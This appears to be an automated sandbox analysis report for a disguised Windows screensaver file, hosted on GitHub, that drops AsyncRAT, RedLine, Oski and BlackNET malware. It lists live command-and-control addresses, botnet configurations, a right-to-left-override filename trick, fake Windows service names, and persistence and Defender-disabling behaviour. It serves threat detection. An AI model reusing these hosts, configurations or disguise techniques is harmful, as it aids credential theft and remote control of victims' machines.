asyncrat | hxxps://github[.]com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls[.][.]scr

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2022 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls..scr

Score

10^/10

asyncrat blacknet oski redline defender hacked securityhealthseurvice system guard runtime discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthSeurvice

217.64.31.3:8437

Mutex

SecurityHealthSeurvice

Attributes

delay
3
install
false
install_file
SecurityHealthSeurvice.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

dEFENDER

20.19.164.86:22616

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

oski

zenginler.online/oski/

Extracted

Family

blacknet

Version

v3.7.0 Public

Botnet

HacKed

http://zenginler.online/blacknet

Mutex

BN[8e74b7adc9cdf87b]

Attributes

antivm
false
elevate_uac
false
install_name
WindowsUpdate.exe
splitter
|BN|
start_name
e162b1333458a713bc6916cc8ac4110c
startup
false
usb_spread
false

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
BlackNET
BlackNET is an open source remote access tool written in VB.NET.
trojan blacknet

BlackNET payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/620-395-0x0000000000400000-0x000000000041E000-memory.dmp	family_blacknet

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral2/memory/620-395-0x0000000000400000-0x000000000041E000-memory.dmp	disable_win_def

Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4068-331-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/1948-311-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral2/memory/3636-348-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
68	1296	powershell.exe
69	3620	powershell.exe
70	2904	powershell.exe
71	4072	powershell.exe
74	5240	powershell.exe
75	208	powershell.exe
78	656	powershell.exe
81	1852	powershell.exe
83	2144	powershell.exe
85	2212	powershell.exe
87	2484	powershell.exe
90	5224	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 25 IoCs

Processes:

BitecoinPaymentApi‮nls.scrWINDOWSHELLHOSTT.EXEDEFENDERRUNTIME.EXEWINDOWSPROTECT.EXEFILEMANAGE.EXEFILEMANAGER.EXEREDLINESECURITY.EXEREDLINESECURTY.EXEpowershell.exeSECURITYHEALTHSERVICE.EXESECURITYHEALTHSEURVIC.EXESECURITYHOST.EXEWINDOWSDEFENDERSMART.EXEDefenderRuntimee.exeDefenderRuntime.exeSecurityHealthService.exeSecurityHealthServic.exeWindowsDefenderSmart.exeRedlinESecurty.exeRedlinESecurity.exeS500ubnan.exeFileManager.exeFileManage.exeSecurityHost.exe

pid	process
2212	BitecoinPaymentApi‮nls.scr
2284	WINDOWSHELLHOSTT.EXE
1512	DEFENDERRUNTIME.EXE
60	WINDOWSPROTECT.EXE
536	FILEMANAGE.EXE
976	FILEMANAGER.EXE
1212	REDLINESECURITY.EXE
4864	REDLINESECURTY.EXE
2484	powershell.exe
3608	SECURITYHEALTHSERVICE.EXE
3380	SECURITYHEALTHSEURVIC.EXE
3676	SECURITYHOST.EXE
224	WINDOWSDEFENDERSMART.EXE
60	WINDOWSPROTECT.EXE
2264	DefenderRuntimee.exe
4176	DefenderRuntime.exe
5816	SecurityHealthService.exe
2572	SecurityHealthServic.exe
2004	WindowsDefenderSmart.exe
4336	RedlinESecurty.exe
3128	RedlinESecurity.exe
5848	S500ubnan.exe
5672	FileManager.exe
4048	FileManage.exe
6104	SecurityHost.exe

Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

4064 attrib.exe
5340 attrib.exe

pid	process
4064	attrib.exe
5340	attrib.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FILEMANAGER.EXESECURITYHOST.EXES500ubnan.exeFILEMANAGE.EXEWINDOWSDEFENDERSMART.EXERegAsm.exeRegAsm.exeDEFENDERRUNTIME.EXEREDLINESECURITY.EXEREDLINESECURTY.EXESECURITYHEALTHSEURVIC.EXERegAsm.exeWINDOWSPROTECT.EXESECURITYHEALTHSERVICE.EXE

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	FILEMANAGER.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	SECURITYHOST.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	S500ubnan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	FILEMANAGE.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WINDOWSDEFENDERSMART.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	DEFENDERRUNTIME.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	REDLINESECURITY.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	REDLINESECURTY.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	SECURITYHEALTHSEURVIC.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WINDOWSPROTECT.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	SECURITYHEALTHSERVICE.EXE

Loads dropped DLL 3 IoCs

Processes:

RegAsm.exe

pid process

6136 RegAsm.exe
6136 RegAsm.exe
6136 RegAsm.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
6136	RegAsm.exe
6136	RegAsm.exe
6136	RegAsm.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exeDefenderRuntime.exepowershell.exepowershell.exeS500ubnan.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIndowShellHost = "C:\\Users\\Admin\\AppData\\Roaming\\WIndowShellHost\\WIndowShellHost.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	DefenderRuntime.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSeurvic = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthSeurvic\\SecurityHealthSeurvic.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RedlinESecurty = "C:\\Users\\Admin\\AppData\\Roaming\\RedlinESecurty\\RedlinESecurty.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthHacker\\SecurityHealthHacker.exe\""	S500ubnan.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHost = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHost\\SecurityHost.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 8 IoCs

Processes:

BitecoinPaymentApi‮nls.scrWINDOWSHELLHOSTT.EXESecurityHealthServic.exeRedlinESecurty.exeDefenderRuntimee.exeSecurityHealthService.exeFileManage.exeSecurityHost.exe

description	pid	process	target process
PID 2212 set thread context of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2284 set thread context of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2572 set thread context of 1948	2572	SecurityHealthServic.exe	RegAsm.exe
PID 4336 set thread context of 4068	4336	RedlinESecurty.exe	RegAsm.exe
PID 2264 set thread context of 3636	2264	DefenderRuntimee.exe	RegAsm.exe
PID 5816 set thread context of 5548	5816	SecurityHealthService.exe	RegAsm.exe
PID 4048 set thread context of 5324	4048	FileManage.exe	RegAsm.exe
PID 6104 set thread context of 6136	6104	SecurityHost.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4076 3128 WerFault.exe RedlinESecurity.exe
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

RegAsm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1776 schtasks.exe
1748 schtasks.exe
620 schtasks.exe
1660 schtasks.exe
2348 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5716 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4936 taskkill.exe

pid	pid_target	process	target process
4076	3128	WerFault.exe	RedlinESecurity.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

pid	process
1776	schtasks.exe
1748	schtasks.exe
620	schtasks.exe
1660	schtasks.exe
2348	schtasks.exe

pid	process
5716	timeout.exe

pid	process
4936	taskkill.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = e8baa059b9aed801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 43 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "156929973"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30990924"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 106a0d0b4ce2d801	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{33372A6C-4E3F-11ED-B696-4AA92575F981} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30990924"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30990924"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000546cf7c9542f2217e27cfe722e15df046d09067f1052fd7b46c1a8ac97eab1fa000000000e800000000200002000000057d0fd3e06f2c5f75e7e903d163c9d4aaba9812a691ab6ef92a192a80ec4f63d2000000087d167b86a6719302c0a7250b2d7d9731afcda91171095b7032cabdda53b29b1400000004567ec21b1d274e2b8751693a6871d41f6024b9fc3760c504f2f064c63f2e917d8fc1afa03ed91581ce8aa7618c5b13a868546117eb22a605c4b20481c4139a9	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000061c58282b1d8f88184652483e47e76f6d824024c8def91d759ab2885becaf874000000000e80000000020000200000006af6a898bb08b10a781dcf7dda1ee3b04520ca37a9112fba42b0b0213721eee920000000bfcdf0af62c1d4b4a2153d191738fa7e708acd29a007167280c5f7ddf559d4c040000000cbeb22bb635d6a2525fb1a5ca17b1b6d8e3aaf3fcff27921a8a97cfa5326d2d7b6d30eb98c1b308038d5a66284beb6bb33c30cfa36666c39783ee38a0b8818c8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "163806479"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "156929973"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0cfef0a4ce2d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{DCAFDBEF-5DB3-4811-A88F-15CD12C6344D}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372791862"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "163806479"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30990924"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Modifies registry class 2 IoCs

Processes:

RegAsm.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

WINDOWSHELLHOSTT.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSecurityHealthServic.exepowershell.exeRedlinESecurty.exepowershell.exeS500ubnan.exe

pid	process
2284	WINDOWSHELLHOSTT.EXE
2284	WINDOWSHELLHOSTT.EXE
4080	powershell.exe
4080	powershell.exe
1296	powershell.exe
1296	powershell.exe
2144	powershell.exe
2144	powershell.exe
2212	powershell.exe
2212	powershell.exe
3620	powershell.exe
3620	powershell.exe
656	powershell.exe
656	powershell.exe
208	powershell.exe
208	powershell.exe
1852	powershell.exe
1852	powershell.exe
4080	powershell.exe
4080	powershell.exe
4072	powershell.exe
4072	powershell.exe
2904	powershell.exe
2904	powershell.exe
2484	powershell.exe
2484	powershell.exe
5224	powershell.exe
5224	powershell.exe
1296	powershell.exe
5240	powershell.exe
5240	powershell.exe
2144	powershell.exe
2212	powershell.exe
3620	powershell.exe
208	powershell.exe
656	powershell.exe
2904	powershell.exe
1852	powershell.exe
4072	powershell.exe
2484	powershell.exe
5224	powershell.exe
5240	powershell.exe
2572	SecurityHealthServic.exe
2572	SecurityHealthServic.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
4336	RedlinESecurty.exe
4336	RedlinESecurty.exe
4896	powershell.exe
4896	powershell.exe
4896	powershell.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe
5848	S500ubnan.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2284	WINDOWSHELLHOSTT.EXE
Token: SeDebugPrivilege	4080	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	656	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	5224	powershell.exe
Token: SeDebugPrivilege	5240	powershell.exe
Token: SeDebugPrivilege	2572	SecurityHealthServic.exe
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	4336	RedlinESecurty.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	4068	RegAsm.exe
Token: SeDebugPrivilege	2264	DefenderRuntimee.exe
Token: SeDebugPrivilege	5848	S500ubnan.exe
Token: SeDebugPrivilege	5816	SecurityHealthService.exe
Token: SeDebugPrivilege	5580	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

3744 iexplore.exe
3744 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

iexplore.exeIEXPLORE.EXEOpenWith.exe

pid process

3744 iexplore.exe
3744 iexplore.exe
864 IEXPLORE.EXE
864 IEXPLORE.EXE
864 IEXPLORE.EXE
864 IEXPLORE.EXE
1752 OpenWith.exe

pid	process
3744	iexplore.exe
3744	iexplore.exe

pid	process
3744	iexplore.exe
3744	iexplore.exe
864	IEXPLORE.EXE
864	IEXPLORE.EXE
864	IEXPLORE.EXE
864	IEXPLORE.EXE
1752	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exeBitecoinPaymentApi‮nls.scrRegAsm.exeWINDOWSHELLHOSTT.EXEcmd.exeRegAsm.exeDEFENDERRUNTIME.EXEWINDOWSPROTECT.EXEFILEMANAGER.EXEFILEMANAGE.EXE

description	pid	process	target process
PID 3744 wrote to memory of 864	3744	iexplore.exe	IEXPLORE.EXE
PID 3744 wrote to memory of 864	3744	iexplore.exe	IEXPLORE.EXE
PID 3744 wrote to memory of 864	3744	iexplore.exe	IEXPLORE.EXE
PID 3744 wrote to memory of 2212	3744	iexplore.exe	BitecoinPaymentApi‮nls.scr
PID 3744 wrote to memory of 2212	3744	iexplore.exe	BitecoinPaymentApi‮nls.scr
PID 3744 wrote to memory of 2212	3744	iexplore.exe	BitecoinPaymentApi‮nls.scr
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 2212 wrote to memory of 1304	2212	BitecoinPaymentApi‮nls.scr	RegAsm.exe
PID 1304 wrote to memory of 2284	1304	RegAsm.exe	WINDOWSHELLHOSTT.EXE
PID 1304 wrote to memory of 2284	1304	RegAsm.exe	WINDOWSHELLHOSTT.EXE
PID 1304 wrote to memory of 2284	1304	RegAsm.exe	WINDOWSHELLHOSTT.EXE
PID 2284 wrote to memory of 4080	2284	WINDOWSHELLHOSTT.EXE	powershell.exe
PID 2284 wrote to memory of 4080	2284	WINDOWSHELLHOSTT.EXE	powershell.exe
PID 2284 wrote to memory of 4080	2284	WINDOWSHELLHOSTT.EXE	powershell.exe
PID 2284 wrote to memory of 2488	2284	WINDOWSHELLHOSTT.EXE	cmd.exe
PID 2284 wrote to memory of 2488	2284	WINDOWSHELLHOSTT.EXE	cmd.exe
PID 2284 wrote to memory of 2488	2284	WINDOWSHELLHOSTT.EXE	cmd.exe
PID 2284 wrote to memory of 2308	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 2308	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 2308	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
PID 2284 wrote to memory of 4032	2284	WINDOWSHELLHOSTT.EXE	RegAsm.exe
